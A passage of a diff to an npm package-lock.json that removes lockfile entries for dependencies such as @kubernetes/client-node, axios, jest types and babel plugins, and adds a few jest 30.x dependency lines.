"sha512-xnkseuNADM0gt2bs+BvhO0p78Mk762YnZdsuzFV018NoG1Sj1SCQvpSqa7XUaTam5vAGasABV9qXASMKnFMwMw==", - "dev": true - }, - "@jridgewell/sourcemap-codec": { - "version": "1.4.14", - "resolved": "https://registry.npmjs.org/@jridgewell/sourcemap-codec/-/sourcemap-codec-1.4.14.tgz", - "integrity": "sha512-XPSJHWmi394fuUuzDnGz1wiKqWfo1yXecHQMRf2l6hztTO+nPru658AyDngaBe7isIxEkRsPR3FZh+s7iVa4Uw==", - "dev": true - }, - "@jridgewell/trace-mapping": { - "version": "0.3.17", - "resolved": "https://registry.npmjs.org/@jridgewell/trace-mapping/-/trace-mapping-0.3.17.tgz", - "integrity": "sha512-MCNzAp77qzKca9+W/+I0+sEpaUnZoeasnghNeVc41VZCEKaCH73Vq3BZZ/SzWIgrqE4H4ceI+p+b6C0mHf9T4g==", - "dev": true, - "requires": { - "@jridgewell/resolve-uri": "3.1.0", - "@jridgewell/sourcemap-codec": "1.4.14" - } - }, - "@kubernetes/client-node": { - "version": "0.18.1", - "resolved": "https://registry.npmjs.org/@kubernetes/client-node/-/client-node-0.18.1.tgz", - "integrity": "sha512-F3JiK9iZnbh81O/da1tD0h8fQMi/MDttWc/JydyUVnjPEom55wVfnpl4zQ/sWD4uKB8FlxYRPiLwV2ZXB+xPKw==", - "requires": { - "@types/js-yaml": "^4.0.1", - "@types/node": "^18.11.17", - "@types/request": "^2.47.1", - "@types/ws": "^8.5.3", - "byline": "^5.0.0", - "isomorphic-ws": "^5.0.0", - "js-yaml": "^4.1.0", - "jsonpath-plus": "^7.2.0", - "openid-client": "^5.3.0", - "request": "^2.88.0", - "rfc4648": "^1.3.0", - "stream-buffers": "^3.0.2", - "tar": "^6.1.11", - "tmp-promise": "^3.0.2", - "tslib": "^2.4.1", - "underscore": "^1.13.6", - "ws": "^8.11.0" - }, - "dependencies": { - "@types/node": { - "version": "18.13.0", - "resolved": "https://registry.npmjs.org/@types/node/-/node-18.13.0.tgz", - "integrity": "sha512-gC3TazRzGoOnoKAhUx+Q0t8S9Tzs74z7m0ipwGpSqQrleP14hKxP4/JUeEQcD3W1/aIpnWl8pHowI7WokuZpXg==" - } - } - }, - "@sinclair/typebox": { - "version": "0.25.21", - "resolved": "https://registry.npmjs.org/@sinclair/typebox/-/typebox-0.25.21.tgz", - "integrity": "sha512-gFukHN4t8K4+wVC+ECqeqwzBDeFeTzBXroBTqE6vcWrQGbEUpHO7LYdG0f4xnvYq4VOEwITSlHlp0JBAIFMS/g==", - "dev": true - }, - "@sinonjs/commons": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/@sinonjs/commons/-/commons-2.0.0.tgz", - "integrity": "sha512-uLa0j859mMrg2slwQYdO/AkrOfmH+X6LTVmNTS9CqexuE2IvVORIkSpJLqePAbEnKJ77aMmCwr1NUZ57120Xcg==", - "dev": true, - "requires": { - "type-detect": "4.0.8" - } - }, - "@sinonjs/fake-timers": { - "version": "10.0.2", - "resolved": "https://registry.npmjs.org/@sinonjs/fake-timers/-/fake-timers-10.0.2.tgz", - "integrity": "sha512-SwUDyjWnah1AaNl7kxsa7cfLhlTYoiyhDAIgyh+El30YvXs/o7OLXpYH88Zdhyx9JExKrmHDJ+10bwIcY80Jmw==", - "dev": true, - "requires": { - "@sinonjs/commons": "^2.0.0" - } - }, - "@types/babel__core": { - "version": "7.1.15", - "resolved": "https://registry.npmjs.org/@types/babel__core/-/babel__core-7.1.15.tgz", - "integrity": "sha512-bxlMKPDbY8x5h6HBwVzEOk2C8fb6SLfYQ5Jw3uBYuYF1lfWk/kbLd81la82vrIkBb0l+JdmrZaDikPrNxpS/Ew==", - "dev": true, - "requires": { - "@babel/parser": "^7.1.0", - "@babel/types": "^7.0.0", - "@types/babel__generator": "*", - "@types/babel__template": "*", - "@types/babel__traverse": "*" - } - }, - "@types/babel__generator": { - "version": "7.6.3", - "resolved": "https://registry.npmjs.org/@types/babel__generator/-/babel__generator-7.6.3.tgz", - "integrity": "sha512-/GWCmzJWqV7diQW54smJZzWbSFf4QYtF71WCKhcx6Ru/tFyQIY2eiiITcCAeuPbNSvT9YCGkVMqqvSk2Z0mXiA==", - "dev": true, - "requires": { - "@babel/types": "^7.0.0" - } - }, - "@types/babel__template": { - "version": "7.4.1", - "resolved": "https://registry.npmjs.org/@types/babel__template/-/babel__template-7.4.1.tgz", - "integrity": "sha512-azBFKemX6kMg5Io+/rdGT0dkGreboUVR0Cdm3fz9QJWpaQGJRQXl7C+6hOTCZcMll7KFyEQpgbYI2lHdsS4U7g==", - "dev": true, - "requires": { - "@babel/parser": "^7.1.0", - "@babel/types": "^7.0.0" - } - }, - "@types/babel__traverse": { - "version": "7.14.2", - "resolved": "https://registry.npmjs.org/@types/babel__traverse/-/babel__traverse-7.14.2.tgz", - "integrity": "sha512-K2waXdXBi2302XUdcHcR1jCeU0LL4TD9HRs/gk0N2Xvrht+G/BfJa4QObBQZfhMdxiCpV3COl5Nfq4uKTeTnJA==", - "dev": true, - "requires": { - "@babel/types": "^7.3.0" - } - }, - "@types/caseless": { - "version": "0.12.2", - "resolved": "https://registry.npmjs.org/@types/caseless/-/caseless-0.12.2.tgz", - "integrity": "sha512-6ckxMjBBD8URvjB6J3NcnuAn5Pkl7t3TizAg+xdlzzQGSPSmBcXf8KoIH0ua/i+tio+ZRUHEXp0HEmvaR4kt0w==" - }, - "@types/graceful-fs": { - "version": "4.1.5", - "resolved": "https://registry.npmjs.org/@types/graceful-fs/-/graceful-fs-4.1.5.tgz", - "integrity": "sha512-anKkLmZZ+xm4p8JWBf4hElkM4XR+EZeA2M9BAkkTldmcyDY4mbdIJnRghDJH3Ov5ooY7/UAoENtmdMSkaAd7Cw==", - "dev": true, - "requires": { - "@types/node": "*" - } - }, - "@types/istanbul-lib-coverage": { - "version": "2.0.3", - "resolved": "https://registry.npmjs.org/@types/istanbul-lib-coverage/-/istanbul-lib-coverage-2.0.3.tgz", - "integrity": "sha512-sz7iLqvVUg1gIedBOvlkxPlc8/uVzyS5OwGz1cKjXzkl3FpL3al0crU8YGU1WoHkxn0Wxbw5tyi6hvzJKNzFsw==", - "dev": true - }, - "@types/istanbul-lib-report": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/@types/istanbul-lib-report/-/istanbul-lib-report-3.0.0.tgz", - "integrity": "sha512-plGgXAPfVKFoYfa9NpYDAkseG+g6Jr294RqeqcqDixSbU34MZVJRi/P+7Y8GDpzkEwLaGZZOpKIEmeVZNtKsrg==", - "dev": true, - "requires": { - "@types/istanbul-lib-coverage": "*" - } - }, - "@types/istanbul-reports": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/@types/istanbul-reports/-/istanbul-reports-3.0.1.tgz", - "integrity": "sha512-c3mAZEuK0lvBp8tmuL74XRKn1+y2dcwOUpH7x4WrF6gk1GIgiluDRgMYQtw2OFcBvAJWlt6ASU3tSqxp0Uu0Aw==", - "dev": true, - "requires": { - "@types/istanbul-lib-report": "*" - } - }, - "@types/jest": { - "version": "29.4.0", - "resolved": "https://registry.npmjs.org/@types/jest/-/jest-29.4.0.tgz", - "integrity": "sha512-VaywcGQ9tPorCX/Jkkni7RWGFfI11whqzs8dvxF41P17Z+z872thvEvlIbznjPJ02kl1HMX3LmLOonsj2n7HeQ==", - "dev": true, - "requires": { - "expect": "^29.0.0", - "pretty-format": "^29.0.0" - } - }, - "@types/js-yaml": { - "version": "4.0.2", - "resolved": "https://registry.npmjs.org/@types/js-yaml/-/js-yaml-4.0.2.tgz", - "integrity": "sha512-KbeHS/Y4R+k+5sWXEYzAZKuB1yQlZtEghuhRxrVRLaqhtoG5+26JwQsa4HyS3AWX8v1Uwukma5HheduUDskasA==" - }, - "@types/lodash": { - "version": "4.14.172", - "resolved": "https://registry.npmjs.org/@types/lodash/-/lodash-4.14.172.tgz", - "integrity": "sha512-/BHF5HAx3em7/KkzVKm3LrsD6HZAXuXO1AJZQ3cRRBZj4oHZDviWPYu0aEplAqDFNHZPW6d3G7KN+ONcCCC7pw==", - "dev": true - }, - "@types/mustache": { - "version": "4.1.2", - "resolved": "https://registry.npmjs.org/@types/mustache/-/mustache-4.1.2.tgz", - "integrity": "sha512-c4OVMMcyodKQ9dpwBwh3ofK9P6U9ZktKU9S+p33UqwMNN1vlv2P0zJZUScTshnx7OEoIIRcCFNQ904sYxZz8kg==", - "dev": true - }, - "@types/node": { - "version": "16.11.19", - "resolved": "https://registry.npmjs.org/@types/node/-/node-16.11.19.tgz", - "integrity": "sha512-BPAcfDPoHlRQNKktbsbnpACGdypPFBuX4xQlsWDE7B8XXcfII+SpOLay3/qZmCLb39kV5S1RTYwXdkx2lwLYng==" - }, - "@types/nodemailer": { - "version": "6.4.4", - "resolved": "https://registry.npmjs.org/@types/nodemailer/-/nodemailer-6.4.4.tgz", - "integrity": "sha512-Ksw4t7iliXeYGvIQcSIgWQ5BLuC/mljIEbjf615svhZL10PE9t+ei8O9gDaD3FPCasUJn9KTLwz2JFJyiiyuqw==", - "dev": true, - "requires": { - "@types/node": "*" - } - }, - "@types/nunjucks": { - "version": "3.1.5", - "resolved": "https://registry.npmjs.org/@types/nunjucks/-/nunjucks-3.1.5.tgz", - "integrity": "sha512-0zEdmQNNvQ+xyV9kqQvAV93UVroTwhE78toVUDT0GBnGcW2jQBZnB4al9qq2LqI5qHOqROy/DvvAY/UwrbvV1A==", - "dev": true - }, - "@types/prettier": { - "version": "2.7.2", - "resolved": "https://registry.npmjs.org/@types/prettier/-/prettier-2.7.2.tgz", - "integrity": "sha512-KufADq8uQqo1pYKVIYzfKbJfBAc0sOeXqGbFaSpv8MRmC/zXgowNZmFcbngndGk922QDmOASEXUZCaY48gs4cg==", - "dev": true - }, - "@types/request": { - "version": "2.48.7", - "resolved": "https://registry.npmjs.org/@types/request/-/request-2.48.7.tgz", - "integrity": "sha512-GWP9AZW7foLd4YQxyFZDBepl0lPsWLMEXDZUjQ/c1gqVPDPECrRZyEzuhJdnPWioFCq3Tv0qoGpMD6U+ygd4ZA==", - "requires": { - "@types/caseless": "*", - "@types/node": "*", - "@types/tough-cookie": "*", - "form-data": "^2.5.0" - } - }, - "@types/stack-utils": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/@types/stack-utils/-/stack-utils-2.0.1.tgz", - "integrity": "sha512-Hl219/BT5fLAaz6NDkSuhzasy49dwQS/DSdu4MdggFB8zcXv7vflBI3xp7FEmkmdDkBUI2bPUNeMttp2knYdxw==", - "dev": true - }, - "@types/tough-cookie": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/@types/tough-cookie/-/tough-cookie-4.0.1.tgz", - "integrity": "sha512-Y0K95ThC3esLEYD6ZuqNek29lNX2EM1qxV8y2FTLUB0ff5wWrk7az+mLrnNFUnaXcgKye22+sFBRXOgpPILZNg==" - }, - "@types/ws": { - "version": "8.5.4", - "resolved": "https://registry.npmjs.org/@types/ws/-/ws-8.5.4.tgz", - "integrity": "sha512-zdQDHKUgcX/zBc4GrwsE/7dVdAD8JR4EuiAXiiUhhfyIJXXb2+PrGshFyeXWQPMmmZ2XxgaqclgpIC7eTXc1mg==", - "requires": { - "@types/node": "*" - } - }, - "@types/yargs": { - "version": "17.0.22", - "resolved": "https://registry.npmjs.org/@types/yargs/-/yargs-17.0.22.tgz", - "integrity": "sha512-pet5WJ9U8yPVRhkwuEIp5ktAeAqRZOq4UdAyWLWzxbtpyXnzbtLdKiXAjJzi/KLmPGS9wk86lUFWZFN6sISo4g==", - "dev": true, - "requires": { - "@types/yargs-parser": "*" - } - }, - "@types/yargs-parser": { - "version": "20.2.1", - "resolved": "https://registry.npmjs.org/@types/yargs-parser/-/yargs-parser-20.2.1.tgz", - "integrity": "sha512-7tFImggNeNBVMsn0vLrpn1H1uPrUBdnARPTpZoitY37ZrdJREzf7I16tMrlK3hen349gr1NYh8CmZQa7CTG6Aw==", - "dev": true - }, - "a-sync-waterfall": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/a-sync-waterfall/-/a-sync-waterfall-1.0.1.tgz", - "integrity": "sha512-RYTOHHdWipFUliRFMCS4X2Yn2X8M87V/OpSqWzKKOGhzqyUxzyVmhHDH9sAvG+ZuQf/TAOFsLCpMw09I1ufUnA==" - }, - "ajv": { - "version": "6.12.6", - "resolved": "https://registry.npmjs.org/ajv/-/ajv-6.12.6.tgz", - "integrity": "sha512-j3fVLgvTo527anyYyJOGTYJbG+vnnQYvE0m5mmkc1TK+nxAppkCLMIL0aZ4dblVCNoGShhm+kzE4ZUykBoMg4g==", - "requires": { - "fast-deep-equal": "^3.1.1", - "fast-json-stable-stringify": "^2.0.0", - "json-schema-traverse": "^0.4.1", - "uri-js": "^4.2.2" - } - }, - "ansi-escapes": { - "version": "4.3.2", - "resolved": "https://registry.npmjs.org/ansi-escapes/-/ansi-escapes-4.3.2.tgz", - "integrity": "sha512-gKXj5ALrKWQLsYG9jlTRmR/xKluxHV+Z9QEwNIgCfM1/uwPMCuzVVnh5mwTd+OuBZcwSIMbqssNWRm1lE51QaQ==", - "dev": true, - "requires": { - "type-fest": "^0.21.3" - } - }, - "ansi-regex": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz", - "integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==", - "dev": true - }, - "ansi-styles": { - "version": "4.3.0", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", - "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", - "dev": true, - "requires": { - "color-convert": "^2.0.1" - } - }, - "anymatch": { - "version": "3.1.2", - "resolved": "https://registry.npmjs.org/anymatch/-/anymatch-3.1.2.tgz", - "integrity": "sha512-P43ePfOAIupkguHUycrc4qJ9kz8ZiuOUijaETwX7THt0Y/GNK7v0aa8rY816xWjZ7rJdA5XdMcpVFTKMq+RvWg==", - "dev": true, - "requires": { - "normalize-path": "^3.0.0", - "picomatch": "^2.0.4" - } - }, - "argparse": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/argparse/-/argparse-2.0.1.tgz", - "integrity": "sha512-8+9WqebbFzpX9OR+Wa6O29asIogeRMzcGtAINdpMHHyAg10f05aSFVBbcEqGf/PXw1EjAZ+q2/bEBg3DvurK3Q==" - }, - "asap": { - "version": "2.0.6", - "resolved": "https://registry.npmjs.org/asap/-/asap-2.0.6.tgz", - "integrity": "sha1-5QNHYR1+aQlDIIu9r+vLwvuGbUY=" - }, - "asn1": { - "version": "0.2.4", - "resolved": "https://registry.npmjs.org/asn1/-/asn1-0.2.4.tgz", - "integrity": "sha512-jxwzQpLQjSmWXgwaCZE9Nz+glAG01yF1QnWgbhGwHI5A6FRIEY6IVqtHhIepHqI7/kyEyQEagBC5mBEFlIYvdg==", - "requires": { - "safer-buffer": "~2.1.0" - } - }, - "assert-plus": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/assert-plus/-/assert-plus-1.0.0.tgz", - "integrity": "sha1-8S4PPF13sLHN2RRpQuTpbB5N1SU=" - }, - "asynckit": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/asynckit/-/asynckit-0.4.0.tgz", - "integrity": "sha1-x57Zf380y48robyXkLzDZkdLS3k=" - }, - "aws-sign2": { - "version": "0.7.0", - "resolved": "https://registry.npmjs.org/aws-sign2/-/aws-sign2-0.7.0.tgz", - "integrity": "sha1-tG6JCTSpWR8tL2+G1+ap8bP+dqg=" - }, - "aws4": { - "version": "1.11.0", - "resolved": "https://registry.npmjs.org/aws4/-/aws4-1.11.0.tgz", - "integrity": "sha512-xh1Rl34h6Fi1DC2WWKfxUTVqRsNnr6LsKz2+hfwDxQJWmrx8+c7ylaqBMcHfl1U1r2dsifOvKX3LQuLNZ+XSvA==" - }, - "axios": { - "version": "1.6.0", - "resolved": "https://registry.npmjs.org/axios/-/axios-1.6.0.tgz", - "integrity": "sha512-EZ1DYihju9pwVB+jg67ogm+Tmqc6JmhamRN6I4Zt8DfZu5lbcQGw3ozH9lFejSJgs/ibaef3A9PMXPLeefFGJg==", - "requires": { - "follow-redirects": "^1.15.0", - "form-data": "^4.0.0", - "proxy-from-env": "^1.1.0" - }, - "dependencies": { - "form-data": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/form-data/-/form-data-4.0.0.tgz", - "integrity": "sha512-ETEklSGi5t0QMZuiXoA/Q6vcnxcLQP5vdugSpuAyi6SVGi2clPPp+xgEhuMaHC+zGgn31Kd235W35f7Hykkaww==", - "requires": { - "asynckit": "^0.4.0", - "combined-stream": "^1.0.8", - "mime-types": "^2.1.12" + "@jest/expect-utils": "30.0.4", + "@jest/get-type": "30.0.1", + "jest-matcher-utils": "30.0.4", + "jest-message-util": "30.0.2", + "jest-mock": "30.0.2", + "jest-util": "30.0.2" } - } - } - }, - "babel-plugin-istanbul": { - "version": "6.1.1", - "resolved": "https://registry.npmjs.org/babel-plugin-istanbul/-/babel-plugin-istanbul-6.1.1.tgz", - "integrity": "sha512-Y1IQok9821cC9onCx5otgFfRm7Lm+I+wwxOx738M/WLPZ9Q42m4IG5W0FNX8WLL2gYMZo3JkuXIH2DOpWM+qwA==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.0.0", - "@istanbuljs/load-nyc-config": "^1.0.0", - "@istanbuljs/schema": "^0.1.2", - "istanbul-lib-instrument": "^5.0.4", - "test-exclude": "^6.0.0" - } - }, - "babel-preset-current-node-syntax": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/babel-preset-current-node-syntax/-/babel-preset-current-node-syntax-1.0.1.tgz", - "integrity": "sha512-M7LQ0bxarkxQoN+vz5aJPsLBn77n8QgTFmo8WK0/44auK2xlCXrYcUxHFxgU7qW5Yzw/CjmLRK2uJzaCd7LvqQ==", - "dev": true, - "requires": { - "@babel/plugin-syntax-async-generators": "^7.8.4", - "@babel/plugin-syntax-bigint": "^7.8.3", - "@babel/plugin-syntax-class-properties": "^7.8.3", - "@babel/plugin-syntax-import-meta": "^7.8.3", - "@babel/plugin-syntax-json-strings": "^7.8.3", - "@babel/plugin-syntax-logical-assignment-operators": "^7.8.3", - "@babel/plugin-syntax-nullish-coalescing-operator": "^7.8.3", - "@babel/plugin-syntax-numeric-separator": "^7.8.3", - "@babel/plugin-syntax-object-rest-spread": "^7.8.3", - "@babel/plugin-syntax-optional-catch-binding": "^7.8.3", - "@babel/plugin-syntax-optional-chaining": "^7.8.3", - "@babel/plugin-syntax-top-level-await": "^7.8.3" - } - }, - "balanced-match": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/balanced-match/-/balanced-match-1.0.2.tgz", - "integrity": "sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==" - }, - "bcrypt-pbkdf": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/bcrypt-pbkdf/-/bcrypt-pbkdf-1.0.2.tgz", - "integrity": "sha1-pDAdOJtqQ/m2f/PKEaP2Y342Dp4=", - "requires": { - "tweetnacl": "^0.14.3" - } - }, - "brace-expansion": { - "version": "1.1.11", - "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-1.1.11.tgz", - "integrity": "sha512-iCuPHDFgrHX7H2vEI/5xpz07zSHB00TpugqhmYtVmMO6518mCuRMoOYFldEBl0g187ufozdaHgWKcYFb61qGiA==", - "requires": { - "balanced-match": "^1.0.0", - "concat-map": "0.0.1" - } - }, - "braces": { - "version": "3.0.3", - "resolved": "https://registry.npmjs.org/braces/-/braces-3.0.3.tgz", - "integrity": "sha512-yQbXgO/OSZVD2IsiLlro+7Hf6Q18EJrKSEsdoMzKePKXct3gvD8oLcOQdIzGupr5Fj+EDe8gO/lxc1BzfMpxvA==", - "dev": true, - "requires": { - "fill-range": "^7.1.1" - } - }, - "browserslist": { - "version": "4.16.7", - "resolved": "https://registry.npmjs.org/browserslist/-/browserslist-4.16.7.tgz", - "integrity": "sha512-7I4qVwqZltJ7j37wObBe3SoTz+nS8APaNcrBOlgoirb6/HbEU2XxW/LpUDTCngM6iauwFqmRTuOMfyKnFGY5JA==", - "dev": true, - "requires": { - "caniuse-lite": "^1.0.30001248", - "colorette": "^1.2.2", - "electron-to-chromium": "^1.3.793", - "escalade": "^3.1.1", - "node-releases": "^1.1.73" - } - }, - "bs-logger": { - "version": "0.2.6", - "resolved": "https://registry.npmjs.org/bs-logger/-/bs-logger-0.2.6.tgz", - "integrity": "sha512-pd8DCoxmbgc7hyPKOvxtqNcjYoOsABPQdcCUjGp3d42VR2CX1ORhk2A87oqqu5R1kk+76nsxZupkmyd+MVtCog==", - "dev": true, - "requires": { - "fast-json-stable-stringify": "2.x" - } - }, - "bser": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/bser/-/bser-2.1.1.tgz", - "integrity": "sha512-gQxTNE/GAfIIrmHLUE3oJyp5FO6HRBfhjnw4/wMmA63ZGDJnWBmgY/lyQBpnDUkGmAhbSe39tx2d/iTOAfglwQ==", - "dev": true, - "requires": { - "node-int64": "^0.4.0" - } - }, - "buffer-from": { - "version": "1.1.2", - "resolved": "https://registry.npmjs.org/buffer-from/-/buffer-from-1.1.2.tgz", - "integrity": "sha512-E+XQCRwSbaaiChtv6k6Dwgc+bx+Bs6vuKJHHl5kox/BaKbhiXzqQOwK4cO22yElGp2OCmjwVhT3HmxgyPGnJfQ==", - "dev": true - }, - "byline": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/byline/-/byline-5.0.0.tgz", - "integrity": "sha1-dBxSFkaOrcRXsDQQEYrXfejB3bE=" - }, - "callsites": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/callsites/-/callsites-3.1.0.tgz", - "integrity": "sha512-P8BjAsXvZS+VIDUI11hHCQEv74YT67YUi5JJFNWIqL235sBmjX4+qx9Muvls5ivyNENctx46xQLQ3aTuE7ssaQ==", - "dev": true - }, - "camelcase": { - "version": "5.3.1", - "resolved": "https://registry.npmjs.org/camelcase/-/camelcase-5.3.1.tgz", - "integrity": "sha512-L28STB170nwWS63UjtlEOE3dldQApaJXZkOI1uMFfzf3rRuPegHaHesyee+YxQ+W6SvRDQV6UrdOdRiR153wJg==", - "dev": true - }, - "caniuse-lite": { - "version": "1.0.30001251", - "resolved": "https://registry.npmjs.org/caniuse-lite/-/caniuse-lite-1.0.30001251.tgz", - "integrity": "sha512-HOe1r+9VkU4TFmnU70z+r7OLmtR+/chB1rdcJUeQlAinjEeb0cKL20tlAtOagNZhbrtLnCvV19B4FmF1rgzl6A==", - "dev": true - }, - "caseless": { - "version": "0.12.0", - "resolved": "https://registry.npmjs.org/caseless/-/caseless-0.12.0.tgz", - "integrity": "sha1-G2gcIf+EAzyCZUMJBolCDRhxUdw=" - }, - "chalk": { - "version": "4.1.2", - "resolved": "https://registry.npmjs.org/chalk/-/chalk-4.1.2.tgz", - "integrity": "sha512-oKnbhFyRIXpUuez8iBMmyEa4nbj4IOQyuhc/wy9kY7/WVPcwIO9VA668Pu8RkO7+0G76SLROeyw9CpQ061i4mA==", - "dev": true, - "requires": { - "ansi-styles": "^4.1.0", - "supports-color": "^7.1.0" - } - }, - "char-regex": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/char-regex/-/char-regex-1.0.2.tgz", - "integrity": "sha512-kWWXztvZ5SBQV+eRgKFeh8q5sLuZY2+8WUIzlxWVTg+oGwY14qylx1KbKzHd8P6ZYkAg0xyIDU9JMHhyJMZ1jw==", - "dev": true - }, - "chownr": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/chownr/-/chownr-2.0.0.tgz", - "integrity": "sha512-bIomtDF5KGpdogkLd9VspvFzk9KfpyyGlS8YFVZl7TGPBHL5snIOnxeshwVgPteQ9b4Eydl+pVbIyE1DcvCWgQ==" - }, - "ci-info": { - "version": "3.2.0", - "resolved": "https://registry.npmjs.org/ci-info/-/ci-info-3.2.0.tgz", - "integrity": "sha512-dVqRX7fLUm8J6FgHJ418XuIgDLZDkYcDFTeL6TA2gt5WlIZUQrrH6EZrNClwT/H0FateUsZkGIOPRrLbP+PR9A==", - "dev": true - }, - "cjs-module-lexer": { - "version": "1.2.2", - "resolved": "https://registry.npmjs.org/cjs-module-lexer/-/cjs-module-lexer-1.2.2.tgz", - "integrity": "sha512-cOU9usZw8/dXIXKtwa8pM0OTJQuJkxMN6w30csNRUerHfeQ5R6U3kkU/FtJeIf3M202OHfY2U8ccInBG7/xogA==", - "dev": true - }, - "cliui": { - "version": "8.0.1", - "resolved": "https://registry.npmjs.org/cliui/-/cliui-8.0.1.tgz", - "integrity": "sha512-BSeNnyus75C4//NQ9gQt1/csTXyo/8Sb+afLAkzAptFuMsod9HFokGNudZpi/oQV73hnVK+sR+5PVRMd+Dr7YQ==", - "dev": true, - "requires": { - "string-width": "^4.2.0", - "strip-ansi": "^6.0.1", - "wrap-ansi": "^7.0.0" - } - }, - "co": { - "version": "4.6.0", - "resolved": "https://registry.npmjs.org/co/-/co-4.6.0.tgz", - "integrity": "sha512-QVb0dM5HvG+uaxitm8wONl7jltx8dqhfU33DcqtOZcLSVIKSDDLDi7+0LbAKiyI8hD9u42m2YxXSkMGWThaecQ==", - "dev": true - }, - "collect-v8-coverage": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/collect-v8-coverage/-/collect-v8-coverage-1.0.1.tgz", - "integrity": "sha512-iBPtljfCNcTKNAto0KEtDfZ3qzjJvqE3aTGZsbhjSBlorqpXJlaWWtPO35D+ZImoC3KWejX64o+yPGxhWSTzfg==", - "dev": true - }, - "color-convert": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-2.0.1.tgz", - "integrity": "sha512-RRECPsj7iu/xb5oKYcsFHSppFNnsj/52OVTRKb4zP5onXwVF3zVmmToNcOfGC+CRDpfK/U584fMg38ZHCaElKQ==", - "dev": true, - "requires": { - "color-name": "~1.1.4" - } - }, - "color-name": { - "version": "1.1.4", - "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.4.tgz", - "integrity": "sha512-dOy+3AuW3a2wNbZHIuMZpTcgjGuLU/uBL/ubcZF9OXbDo8ff4O8yVp5Bf0efS8uEoYo5q4Fx7dY9OgQGXgAsQA==", - "dev": true - }, - "colorette": { - "version": "1.3.0", - "resolved": "https://registry.npmjs.org/colorette/-/colorette-1.3.0.tgz", - "integrity": "sha512-ecORCqbSFP7Wm8Y6lyqMJjexBQqXSF7SSeaTyGGphogUjBlFP9m9o08wy86HL2uB7fMTxtOUzLMk7ogKcxMg1w==", - "dev": true - }, - "combined-stream": { - "version": "1.0.8", - "resolved": "https://registry.npmjs.org/combined-stream/-/combined-stream-1.0.8.tgz", - "integrity": "sha512-FQN4MRfuJeHf7cBbBMJFXhKSDq+2kAArBlmRBvcvFE5BB1HZKXtSFASDhdlz9zOYwxh8lDdnvmMOe/+5cdoEdg==", - "requires": { - "delayed-stream": "~1.0.0" - } - }, - "commander": { - "version": "5.1.0", - "resolved": "https://registry.npmjs.org/commander/-/commander-5.1.0.tgz", - "integrity": "sha512-P0CysNDQ7rtVw4QIQtm+MRxV66vKFSvlsQvGYXZWR3qFU0jlMKHZZZgw8e+8DSah4UDKMqnknRDQz+xuQXQ/Zg==" - }, - "concat-map": { - "version": "0.0.1", - "resolved": "https://registry.npmjs.org/concat-map/-/concat-map-0.0.1.tgz", - "integrity": "sha1-2Klr13/Wjfd5OnMDajug1UBdR3s=" - }, - "convert-source-map": { - "version": "1.8.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-1.8.0.tgz", - "integrity": "sha512-+OQdjP49zViI/6i7nIJpA8rAl4sV/JdPfU9nZs3VqOwGIgizICvuN2ru6fMd+4llL0tar18UYJXfZ/TWtmhUjA==", - "dev": true, - "requires": { - "safe-buffer": "~5.1.1" - } - }, - "core-util-is": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/core-util-is/-/core-util-is-1.0.2.tgz", - "integrity": "sha1-tf1UIgqivFq1eqtxQMlAdUUDwac=" - }, - "cross-spawn": { - "version": "7.0.3", - "resolved": "https://registry.npmjs.org/cross-spawn/-/cross-spawn-7.0.3.tgz", - "integrity": "sha512-iRDPJKUPVEND7dHPO8rkbOnPpyDygcDFtWjpeWNCgy8WP2rXcxXL8TskReQl6OrB2G7+UJrags1q15Fudc7G6w==", - "dev": true, - "requires": { - "path-key": "^3.1.0", - "shebang-command": "^2.0.0", - "which": "^2.0.1" - } - }, - "dashdash": { - "version": "1.14.1", - "resolved": "https://registry.npmjs.org/dashdash/-/dashdash-1.14.1.tgz", - "integrity": "sha1-hTz6D3y+L+1d4gMmuN1YEDX24vA=", - "requires": { - "assert-plus": "^1.0.0" - } - }, - "debug": { - "version": "4.3.2", - "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.2.tgz", - "integrity": "sha512-mOp8wKcvj7XxC78zLgw/ZA+6TSgkoE2C/ienthhRD298T7UNwAg9diBpLRxC0mOezLl4B0xV7M0cCO6P/O0Xhw==", - "dev": true, - "requires": { - "ms": "2.1.2" - } - }, - "dedent": { - "version": "0.7.0", - "resolved": "https://registry.npmjs.org/dedent/-/dedent-0.7.0.tgz", - "integrity": 